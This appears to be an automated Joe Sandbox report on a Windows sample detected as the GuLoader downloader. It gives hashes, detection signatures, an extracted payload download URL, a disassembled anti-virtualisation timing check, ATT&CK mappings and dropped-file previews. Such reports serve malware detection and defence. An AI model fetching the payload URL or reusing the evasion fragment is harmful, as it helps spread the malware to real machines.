Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xcVh7ZmH4Y

Overview

General Information

Sample Name:xcVh7ZmH4Y (renamed file extension from none to exe)
Analysis ID:623886
MD5:d17d180329065df1bf54501a2c8e138b
SHA1:255c70621a90d6070d2585ef47eaff05c143c54a
SHA256:6a3b4d2025462d750011db9881bd74700cf7e2e7708398a18dfec422555ba438
Tags:exe
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Abnormal high CPU Usage
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • xcVh7ZmH4Y.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: D17D180329065DF1BF54501A2C8E138B)
  • cleanup
{"Payload URL": "https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.896769853.0000000002D00000.00000040.00000001.00040000.00000007.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: xcVh7ZmH4Y.exeAvira: detected
    Source: 00000000.00000002.896769853.0000000002D00000.00000040.00000001.00040000.00000007.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA"}
    Source: xcVh7ZmH4Y.exeMetadefender: Detection: 22%Perma Link
    Source: xcVh7ZmH4Y.exeReversingLabs: Detection: 39%
    Source: xcVh7ZmH4Y.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: xcVh7ZmH4Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.dr
    Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.dr
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.F
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: xcVh7ZmH4Y.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
    Source: AsOpenFile.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: AsOpenFile.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
    Source: xcVh7ZmH4Y.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAsOpenFile.exeL vs xcVh7ZmH4Y.exe
    Source: xcVh7ZmH4Y.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: AsOpenFile.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040755C0_2_0040755C
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_00406D850_2_00406D85
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_73541BFF0_2_73541BFF
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess Stats: CPU usage > 98%
    Source: xcVh7ZmH4Y.exeMetadefender: Detection: 22%
    Source: xcVh7ZmH4Y.exeReversingLabs: Detection: 39%
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile read: C:\Users\user\Desktop\xcVh7ZmH4Y.exeJump to behavior
    Source: xcVh7ZmH4Y.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile created: C:\Users\user\AppData\Local\Temp\nsg70C8.tmpJump to behavior
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile written: C:\Users\user\AppData\Local\Temp\duperinger.iniJump to behavior
    Source: classification engineClassification label: mal80.troj.evad.winEXE@1/7@0/0
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
    Source: xcVh7ZmH4Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.dr
    Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: xcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.0.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000000.00000002.896769853.0000000002D00000.00000040.00000001.00040000.00000007.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_735430C0 push eax; ret 0_2_735430EE
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_73541BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73541BFF
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile created: C:\Users\user\AppData\Local\Temp\AsOpenFile.exeJump to dropped file
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeFile created: C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeRDTSC instruction interceptor: First address: 0000000002D05B85 second address: 0000000002D05B85 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, dx 0x00000005 test ch, bh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F51ECBB244Dh 0x0000000b inc ebp 0x0000000c test edi, 09E7C1CFh 0x00000012 inc ebx 0x00000013 cmp ah, dh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsOpenFile.exeJump to dropped file
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeAPI call chain: ExitProcess graph end nodegraph_0-4299
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeAPI call chain: ExitProcess graph end nodegraph_0-4456
    Source: xcVh7ZmH4Y.exe, 00000000.00000002.895956305.0000000000731000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_73541BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73541BFF
    Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    1
    Access Token Manipulation
    OS Credential Dumping1
    Query Registry
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Obfuscated Files or Information
    LSASS Memory11
    Security Software Discovery
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth1
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager3
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS13
    System Information Discovery
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    xcVh7ZmH4Y.exe23%MetadefenderBrowse
    xcVh7ZmH4Y.exe39%ReversingLabsWin32.Downloader.GuLoader
    xcVh7ZmH4Y.exe100%AviraTR/Inject.CT
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\AsOpenFile.exe0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\AsOpenFile.exe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://crl.F0%Avira URL Cloudsafe
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorxcVh7ZmH4Y.exefalse
      high
      http://crl.FxcVh7ZmH4Y.exe, 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      No contacted IP infos
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:623886
      Start date and time: 10/05/202221:59:322022-05-10 21:59:32 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 4s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:xcVh7ZmH4Y (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:17
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.troj.evad.winEXE@1/7@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.5% (good quality ratio 84.3%)
      • Quality average: 86.8%
      • Quality standard deviation: 21.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 43
      • Number of non-executed functions: 31
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: xcVh7ZmH4Y.exe
      No simulations
      No context
      No context
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nss732B.tmp\System.dll3GJ6S3Kwnb.exeGet hashmaliciousBrowse
        3GJ6S3Kwnb.exeGet hashmaliciousBrowse
          file.exeGet hashmaliciousBrowse
            file.exeGet hashmaliciousBrowse
              Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                Bayaran Balik Cukai Terlebih Bayar.exeGet hashmaliciousBrowse
                  7RsSycKaNc.exeGet hashmaliciousBrowse
                    7RsSycKaNc.exeGet hashmaliciousBrowse
                      potwierdzenie wplaty.exeGet hashmaliciousBrowse
                        potwierdzenie wplaty.exeGet hashmaliciousBrowse
                          Docs advice copy.exeGet hashmaliciousBrowse
                            Docs advice copy.exeGet hashmaliciousBrowse
                              Transferencia desde ING.exeGet hashmaliciousBrowse
                                Transferencia desde ING.exeGet hashmaliciousBrowse
                                  shipping document.exeGet hashmaliciousBrowse
                                    shipping document.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.Trojan.Win32.Woreflint.Acl.5382.exeGet hashmaliciousBrowse
                                          SecuriteInfo.com.generic.ml.1686.exeGet hashmaliciousBrowse
                                            gunzipped.exeGet hashmaliciousBrowse
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                              Category:dropped
                                              Size (bytes):7034
                                              Entropy (8bit):7.874844124591446
                                              Encrypted:false
                                              SSDEEP:192:oXR8klpIMVf8CS3YqolBYC7ulSDIgQmFPb9l:KRTlvVfTSIPlBHSHmV
                                              MD5:CA6DEA86854AFA7188D36EAC6C9E88C3
                                              SHA1:7A05B62C2E39DABA0F6548F159A4428F07E476CE
                                              SHA-256:35F6BD6D5E34DFB89E9D55DB626A97F582B1A9DFED0DB6514BE9D2BB36674766
                                              SHA-512:6CC963F7E074E4037A1092661DFD219CE1C61DA8465766D0F9D6BAE0D1B3A91AE53415C0D98E5DC1D9FB5A082F47E1EB8E48334D6CD993888E680DA4D37EA7FC
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(.....i.....G...S...[.*.;.......U..hz|.2M..i}..o..<.N..3.i..q..\\.3M._.G..........1...Z-....7....n..1X.Zg.6:.........)..?..h.8......._..?...w..-b..z..<I.?...n..R.j..........!.....4E.ny.........r....M......o.C"At.|+....!ai.....z..........L9`Y.....<...'.*].....w.Q..Q^.}oe=....
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):38632
                                              Entropy (8bit):5.840976252158136
                                              Encrypted:false
                                              SSDEEP:768:tba0g4rhVUkxIIaPrd6cMCP1diTLmz1BeeKH2X98VwhH:HPUkxIIaPrsCPXK6z1Bee3+k
                                              MD5:ED609F8F09DE8AAA4F8CFF0285E0420A
                                              SHA1:A7ADE9EB5BD4BAEFAB796C1D6EA92417F1396135
                                              SHA-256:2488796ACE769813C729198CFD9E3C9D0A512168301D387BE569F2557C683821
                                              SHA-512:32F080433C121FE1970BBB82911024A389E43B8B6BA059931FF0F3AFA4096BE79660C6DC9C1E027C21692D320F95896B0211C9FA0997AEC30F7A373382443FF2
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..r..r..r..4r..r..s..r..s..r..s..r..s..r..r..r..s..rp.s..rp.Xr..r.0r..rp.s..rRich..r........................PE..d......a..........#..........^.................@....................................Vo.... ..................................................N..........h....p..L....x...............B..p...................@D..(...@C...............0...............................text............................... ..`.rdata..*....0...0..."..............@..@.data........`.......R..............@....pdata..L....p.......T..............@..@.rsrc...h........ ...X..............@..@................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):107600
                                              Entropy (8bit):6.716084941250493
                                              Encrypted:false
                                              SSDEEP:1536:OnVDP3flBi/Rzv+bWZeail8LD3vqJID7m1dWM/ACqrLcxmTlodLRZA:6xlBM7pealD/qWmbj/ArcnFZA
                                              MD5:3DC4351E49C286A5D2AAA510B0917777
                                              SHA1:8B24CE404813D701AA53D92AFD892EFA1860FC02
                                              SHA-256:4BD89C5A04D57746BD92264A03274791F95256FE3295A6F42820399F620730AE
                                              SHA-512:54973F8B9C3EA0742BB1A520D8BFAD816E4B53AEC34C89E082B26DDC871EE63244394AF53C8C3D0DCAD85AFFC0A5FB57AD501E016ECF040AAFCA8B83E85B19E5
                                              Malicious:false
                                              Reputation:low
                                              Preview:x.?..q/r....cB]...-9.#..c....,#....Z....q.k..g}.r{..<1O.f..=...|..;."......U.P..E.i^....Qi...[.....V..2~.=.{.jz$:.IT.o........R...."`.....u..+.qeq..4. ...P.{)L..J....f.nL.*..5.ms......ft..:/7.p..N.c.-...OC11!S...]..f..Y.$c./|.y:.,.....f..Hj.....F...m+Fx....$C...56...Z.b2.g.S..T.+`.q..b.".....M...m54..2b&.u...(^&..&...y.f:..u.5.'WWU^E.[..}8...P.]y.;)......K.:.O..3..R.0$LF...oE.-u.\..j.+..^D......+SAXN.b...)J....Pn......s]>..."......&..5....q1K.+..8.W6..,.E!,Q...N..a..6.w.t'.Q.......1.......0Z..{bc....f.I...5k.....V.r.m...d..Zt{._.6|..gH.z...?X..#r-=.......Uo.c.0q.*.?<.U.eMe3..S.;.....T.h.......+o..s....!.oXs!.)......X....ek0...8!..,5.Y3[..?Js.....Y..0...3.|;}tFE.6.".%Y.z.P.....s.H".G.[.b..hT.Yo..A.o.c2..Z..Z...t..>...2.Z.....1.F.Mq...D...a7...6....e..r'....3&...r..<.Y.n...i<..T?...P.B!...@.?..Xy..G'r4..v4.y^.\.`......8....M....}I...{.%.....3Q..k'X...@..d..Gp...s.n.......c...........$.c)BB.i..I.\h.)YT..U.....5.tM.d......v..
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                              Category:dropped
                                              Size (bytes):10115
                                              Entropy (8bit):7.896422756961018
                                              Encrypted:false
                                              SSDEEP:192:oXRIG87sv/m1vnKaVSuKRXL55hOuf4dXL9J0LEvJyVVcuJ6Sj7YvKvtOJ:KRIjsW1vKPXBgdiWMEMj7YyvG
                                              MD5:2F12A714A50993C090C94EC2672490E1
                                              SHA1:4F9A319C412F1B1B251C027B1C2448BBDBB9CA6F
                                              SHA-256:E759639DCCA8E96864BC82EDBACFD5BB14FE37412A6F3FCE7C82BF1BB944B6E4
                                              SHA-512:2B349EAB24DCCE0DBD36433DE13E0B2A551E88A626D5C9A3F68B79E21ACDE4FC238DD4E280E30ACBB76B0EB0E08CE1ACC233AB1C9E2147E2DD01E0917B3A376B
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.....d.d.....:Exif..MM.*......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(..0..?l...9.l...7.......S.h..5.....!9...[..$M...E'..y.l@Xxg.i...........?..7..3M.........E...L..Z.$....B.b.@...y.y'..}._.|c......5....G..5-{l.-....+._Q....7......D.|....M.Hb..x....._P./o...RJ0{Zr..q+.....1.......X......G.....|1}...}.a.}/J..Gk.[...j.......+.. .n"..X.Q..9..$....o.....8...o.|K....}
                                              Process:C:\Users\user\Desktop\xcVh7ZmH4Y.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):37
                                              Entropy (8bit):4.432294243948856
                                              Encrypted:false
                                              SSDEEP:3:1HMWqYhfczC7v:1ffjv
                                              MD5:F34AA87B2A4A9593506E17AE5AD7657F
                                              SHA1:37DA57F785BC83EFDC442863B8E11F12B850A17F
                                              SHA-256:6DF91395E1AE5EE71A11675B089F0AC4EF6330C9217022B6FEEF07E68FE65128
